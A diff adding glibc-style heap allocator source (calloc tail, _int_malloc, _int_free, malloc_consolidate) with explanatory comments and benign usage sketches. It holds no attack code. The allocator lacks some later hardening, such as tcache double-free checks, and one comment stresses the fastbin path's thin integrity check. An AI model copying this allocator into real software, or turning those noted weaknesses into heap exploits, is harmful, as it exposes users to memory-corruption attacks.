+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8-byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
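+
+/* _int_malloc searches its sources in a fixed order: the fastbins for
+   requests no larger than get_max_fast (), then an exact-fit small bin,
+   then (after consolidating fastbins for large requests) the unsorted
+   bin, the sorted large bins and the binmap scan over larger bins, and
+   finally the top chunk, with sysmalloc as the last resort when top
+   cannot supply the request.  */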
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
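+
+  /* The only integrity check on this path is the
+     fastbin_index (chunksize (victim)) == idx comparison below; the fd
+     pointer pulled out of the bin is otherwise used as-is.  */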
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find the best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs.  And the programs in which
+     it is called frequently would otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
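+
+  /* malloc_consolidate empties every fastbin, coalescing each chunk with
+     its free neighbours and placing the result in the unsorted bin (or
+     merging it into top when adjacent).  */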
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is an exact fit, or, if this is a small request, the chunk is the remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
+              || __builtin_expect (chunksize_nomask (victim)
+				   > av->system_mem, 0))
+            malloc_printerr ("malloc(): memory corruption");
+          size = chunksize (victim);
+
+          /*
+             If a small request, try to use the last remainder if it is the
+             only chunk in the unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          if (__glibc_unlikely (bck->fd != victim))
+            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink (av, victim, bck, fwd);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
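+
+/* A minimal usage sketch (not from the upstream sources; assuming default
+   tunables on a typical glibc build): with the tcache and fastbin front
+   ends above, freeing a small chunk and then requesting the same size is
+   normally served from the per-thread cache, so the same address comes back.
+
+     #include <stdio.h>
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       void *a = malloc (24);       // small, tcache-sized request
+       free (a);                    // cached in the tcache (or a fastbin)
+       void *b = malloc (24);       // served straight from the cache
+       printf ("same chunk: %d\n", a == b);
+       return 0;
+     }
+*/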
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+
+    if (tcache
+	&& tc_idx < mp_.tcache_bins
+	&& tcache->counts[tc_idx] < mp_.tcache_count)
+      {
+	tcache_put (p, tc_idx);
+	return;
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      unlink(av, p, bck, fwd);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink(av, nextchunk, bck, fwd);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
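+
+/* A minimal sketch (not from the upstream sources): the pointer checks at
+   the top of _int_free turn a misaligned or otherwise bogus free into an
+   immediate abort instead of silent corruption.  On a typical build this
+   program is expected to die with a message such as "free(): invalid
+   pointer":
+
+     #include <stdlib.h>
+
+     int main (void)
+     {
+       char *p = malloc (32);
+       free (p + 1);                // misaligned chunk pointer -> abort
+       return 0;
+     }
+*/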
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+  mchunkptr       bck;
+  mchunkptr       fwd;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from its fast bin and consolidate it, placing it
+    in the unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
